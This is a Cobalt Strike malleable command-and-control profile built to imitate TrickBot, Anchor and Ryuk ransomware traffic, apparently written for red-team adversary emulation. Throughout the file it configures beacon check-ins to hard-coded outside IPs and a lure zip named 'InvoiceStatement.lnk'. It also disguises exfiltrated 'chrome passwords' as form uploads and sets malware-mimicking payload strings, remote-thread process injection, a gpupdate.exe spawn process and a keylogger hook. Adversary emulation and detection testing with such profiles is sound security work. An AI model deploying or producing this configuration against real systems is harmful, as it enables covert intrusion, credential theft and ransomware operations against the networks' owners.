#trick_ryuk.profile #for CS 4.2, if not then c2lint will not like it. #https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf #https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/ #xx0hcd ###Global Options### set sample_name "trick_ryuk.profile"; set sleeptime "5000"; set jitter "20"; set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; set host_stage "true"; ###DNS options### set dns_idle "8.8.8.8"; set maxdns "245"; set dns_sleep "0"; set dns_stager_prepend ""; set dns_stager_subhost ""; set dns_max_txt "252"; set dns_ttl "1"; ###SMB options### set pipename "ntsvcs##"; set pipename_stager "scerpc##"; ###TCP options### set tcp_port "8000"; ####SSH options### set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)"; set ssh_pipename "SearchTextHarvester##"; ###SSL Options### #https-certificate { #set keystore ""; #set password ""; #} #https-certificate { # set C "US"; # set CN "whatever.com"; # set L "California"; # set O "whatever LLC."; # set OU "local.org"; # set ST "CA"; # set validity "365"; #} #code-signer { #set keystore "your_keystore.jks"; #set password "your_password"; #set alias "server"; #} ###HTTP-Config Block### #http-config { # set headers "Server, Content-Type"; # header "Content-Type" "text/html;charset=UTF-8"; # header "Server" "nginx"; # # set trust_x_forwarded_for "false"; #} ###HTTP-GET Block### http-get { set uri "/dd05ce3a-a9c9-4018-8252-d579eed1e670.zip"; client { header "Accept" "text/html, application/xhtml+xml, */*"; header "Accept-Language" "en-US"; header "Host" "23.95.97.59"; header "Connection" "Keep-Alive"; metadata { base64url; prepend "SESSIONID="; header "Cookie"; } } server { header "Server" "Apache"; header "Upgrade" "h2,h2c"; header "Connection" "Upgrade, Keep-Alive"; header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT"; header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\""; header "Accept-Ranges" "bytes"; header "Vary" "Accept-Encoding,User-Agent"; header "Keep-Alive" "timeout=5"; output { netbios; prepend "PK.........080..W.3 ...1.....InvoiceStatement.lnk.Z_.^G..m.j.....\".....f{... 7..464.v7.6M..b.o.m..&.M6. ....\"..E..|..P.(R%.J..A.....'..9g...L>....;..;3g........B..1S.. 3.........V....v.......|.....>"; append ".....achor_dns....."; print; } } } #HTTP-GET VARIANT http-get "get_ryuk" { set uri "/files"; client { metadata { base64url; prepend "SESSIONID="; header "Cookie"; } } server { output { netbios; prepend ""; append ""; print; } } } ###HTTP-POST VARIANT### http-post "post_ryuk" { set uri "/id"; set verb "GET"; client { output { netbios; parameter "1"; } id { base64url; parameter "id"; } } server { output { netbios; print; } } } ###HTTP-Post Block### http-post { set uri "/ono19/ADMIN-DESKTOP.AC3B679F4A22738281E6D7B0C5946E42/81/"; #set verb "GET"; set verb "POST"; client { header "Accept" "*/*"; #header "Host" ""; #header "Connection" "close"; header "Content-Type" "multipart/form-data; boundary=-----------KMOGEEQTLQTCQMYE"; output { netbios; #prepend "SESSIONID="; #header "COOKIE"; prepend "-----------KMOGEEQTLQTCQMYE Content-Disposition: form-data; name=\"data\" https://nytimes.com/|Admin|"; append "\n-----------KMOGEEQTLQTCQMYE Content-Disposition: form-data; name=\"source\" chrome passwords -----------KMOGEEQTLQTCQMYE--"; print; } id { base64url; parameter "id"; } } server { header "Connection" "close"; header "Server" "Cowboy"; header "Content-Type" "text/plain"; output { netbios; prepend "/1/\n"; append ""; print; } } } ###HTTP-Stager Block### http-stager { set uri_x86 "/dd05ce3a-a9c9-4018-8252-D579eed1e670.zip"; set uri_x64 "/Dd05ce3a-a9c9-4018-8252-d579eed1e670.zip"; client { header "Host" "51.254.25.115"; header "Connection" "Keep-Alive"; } server { header "Server" "Apache"; header "Upgrade" "h2,h2c"; header "Connection" "Upgrade, Keep-Alive"; header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT"; header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\""; header "Accept-Ranges" "bytes"; header "Vary" "Accept-Encoding,User-Agent"; header "Keep-Alive" "timeout=5"; output { print; } } } ###Malleable PE/Stage Block### #some options taken from -> https://otx.alienvault.com/indicator/file/7b9526f82448d0a1fb59a8125d1de55e3a166d72 stage { set checksum "0"; set compile_time "16 Apr 2020 17:56:00"; set entry_point "170000"; set image_size_x86 "383992"; set image_size_x64 "383992"; #set name "WWanMM.dll"; set userwx "false"; set cleanup "false"; set sleep_mask "false"; set stomppe "false"; set obfuscate "false"; set rich_header "bd8cf6bfbbaf89f44f2e0189ce41549f4d4c550a712cc5660619e4ac3b4adce9"; #new 4.2. options #set allocator "HeapAlloc"; #set magic_mx_x86 "MZRE"; #set magic_mz_x64 "MZAR"; #set magic_pe "PE"; set sleep_mask "false"; #set module_x86 "wwanmm.dll"; #set module_x64 "wwanmm.dll"; transform-x86 { #prepend "\x90\x90\x90"; strrep "ReflectiveLoader" ""; strrep "beacon.dll" ""; } transform-x64 { #prepend "\x90\x90\x90"; strrep "ReflectiveLoader" ""; strrep "beacon.x64.dll" ""; } string ",Control_RunDLL \x00"; string "start program with cmdline \"%s"; string "Global\\fde345tyhoVGYHUJKIOuy"; string "get command: incode %s, cmdid \"%s\", cmd \"%s "; string "anchorDNS"; string "Anchor_x86"; string "Anchor_x64"; string "{43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00}"; string "{6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00}"; string "checkip.amazonaws.com"; string "wtfismyip.com"; string "{83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}"; string "{48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}"; string ":\\Anchor\\Win32\\Release\\Anchor_"; } ###Process Inject Block### process-inject { #set allocator "NtMapViewOfSection"; set min_alloc "16700"; set userwx "false"; set startrwx "false"; transform-x86 { #prepend "\x90\x90\x90"; } transform-x64 { #prepend "\x90\x90\x90"; } execute { CreateThread; CreateRemoteThread; CreateThread "ntdll.dll!RtlUserThreadStart+0x1000"; SetThreadContext; NtQueueApcThread-s; #NtQueueApcThread; CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000"; RtlCreateUserThread; } } ###Post-Ex Block### post-ex { set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe"; set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe"; set obfuscate "false"; set smartinject "false"; set amsi_disable "false"; #new 4.2 options set thread_hint "ntdll.dll!RtlUserThreadStart"; set pipename "DserNamePipe##"; set keylogger "SetWindowsHookEx"; }